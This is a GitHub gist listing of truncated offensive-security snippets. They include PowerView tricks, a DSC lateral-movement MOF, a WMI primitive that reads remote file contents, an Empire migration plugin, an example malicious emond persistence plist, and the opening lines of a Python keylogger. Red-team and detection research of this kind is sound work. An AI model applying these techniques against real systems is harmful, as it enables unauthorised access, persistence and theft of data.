Skip to content

Instantly share code, notes, and snippets.

Chris Ross xorrior

Block or report user

Report or block xorrior

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@xorrior
xorrior / PowerView-3.0-tricks.ps1
Created Jul 5, 2018 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
View PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
View PowerShellDSCLateralMovement.ps1
# This idea originated from this blog post on Invoke DSC Resources directly:
# https://blogs.msdn.microsoft.com/powershell/2015/02/27/invoking-powershell-dsc-resources-directly/
<#
$MOFContents = @'
instance of MSFT_ScriptResource as $MSFT_ScriptResource1ref
{
ResourceID = "[Script]ScriptExample";
GetScript = "\"$(Get-Date): I am being GET\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
TestScript = "\"$(Get-Date): I am being TESTED\" | Out-File C:\\Windows\\Temp\\ScriptRun.txt -Append; return $True";
@xorrior
xorrior / FileReadPrimitive.ps1
Created Jun 28, 2018 — forked from mattifestation/FileReadPrimitive.ps1
A WMI file content read primitive - ROOT/Microsoft/Windows/Powershellv3/PS_ModuleFile
View FileReadPrimitive.ps1
$CimSession = New-CimSession -ComputerName 10.0.0.2
$FilePath = 'C:\Windows\System32\notepad.exe'
# PS_ModuleFile only implements GetInstance (versus EnumerateInstance) so this trick below will force a "Get" operation versus the default "Enumerate" operation.
$PSModuleFileClass = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $CimSession
$InMemoryModuleFileInstance = New-CimInstance -CimClass $PSModuleFileClass -Property @{ InstanceID= $FilePath } -ClientOnly
$FileContents = Get-CimInstance -InputObject $InMemoryModuleFileInstance -CimSession $CimSession
$FileLengthBytes = $FileContents.FileData[0..3]
[Array]::Reverse($FileLengthBytes)
@xorrior
xorrior / SMConfMigratorPlugin.h
Created Jun 18, 2018
SMConfMigratorPlugin header file
View SMConfMigratorPlugin.h
//
// Generated by class-dump 3.5 (64 bit).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2013 by Steve Nygard.
//
#import "NSObject.h"
#import "SMSystem_FileManagerProtocol.h"
//<SMSystem_FileManagerProtocol>
@class NSObject, SMMigrationRequest;
@xorrior
xorrior / empire-migrationplugin.m
Created May 25, 2018
Migration Plugin with Empire Payload
View empire-migrationplugin.m
//
// demoClass.m
// testExampleBundle
//
// Created by Chris Ross on 4/17/18.
// Copyright © 2018 Void. All rights reserved.
//
#import <Foundation/Foundation.h>
#import <objc/objc.h>
@xorrior
xorrior / messagebox.m
Last active Apr 3, 2019
Installer Plugin that pops a message box to the user
View messagebox.m
//
// MyInstallerPane.m
// messagebox
//
// Created by Chris Ross on 1/23/18.
// Copyright © 2018 testplugin. All rights reserved.
//
/*
This should be in MyInstallerPane.h
@xorrior
xorrior / emond-examples.txt
Last active Jan 19, 2018
fswatch and osquery command syntax w/ output
View emond-examples.txt
Fswatch command
fswatch -r --format="'{\"path\": \"%p\", \"timestamp\":\"%t\", \"flag\": \"%f\"}'" /etc/emond.d/rules/
Output when event is triggered
'{"path": "/private/etc/emond.d/rules/test.plist", "timestamp":"Tue Jan 16 21:17:24 2018", "flag": "PlatformSpecific IsFile"}'
osquery.results.log output from event.
{"name":"file_events","hostIdentifier":"host","calendarTime":"Thu Jan 11 07:00:10 2018 UTC","unixTime":"1515654010","epoch":"0","counter":"0","columns":{"action":"CREATED","atime":"1515653980","category":"emond","ctime":"1515653980","gid":"0","hashed":"1","inode":"1316814","md5":"b1f38ed6d9dca2d33ce733d51617e900","mode":"0644","mtime":"1515653980","sha1":"003a4a25662147ca19692dd01d2d7e06ea751c5e","sha256":"f26ee0eab108d3794426f609ccd878d7a7057e2fab3bea215152e4f35c82b0cf","size":"986","target_path":"\/private\/etc\/emond.d\/rules\/test.plist","time":"1515653983","transaction_id":"2101010","uid":"0"},"action":"added"}
@xorrior
xorrior / bad.plist
Last active May 16, 2018
Example Malicious emond plist
View bad.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
<dict>
<key>name</key>
<string>empire rules</string>
<key>enabled</key>
<true/>
<key>eventTypes</key>
@xorrior
xorrior / SampleRules.plist
Created Jan 9, 2018
Sample Plist for emond
View SampleRules.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<array>
<dict>
<key>name</key>
<string>sample rule</string>
<key>enabled</key>
<true/>
<key>eventTypes</key>
@xorrior
xorrior / keylogger.py
Created Dec 11, 2017
Python on disk keylogger
View keylogger.py
import zipfile
import io
import sys
import os, imp
import base64
import threading
moduleRepo = {}
_meta_cache = {}
You can’t perform that action at this time.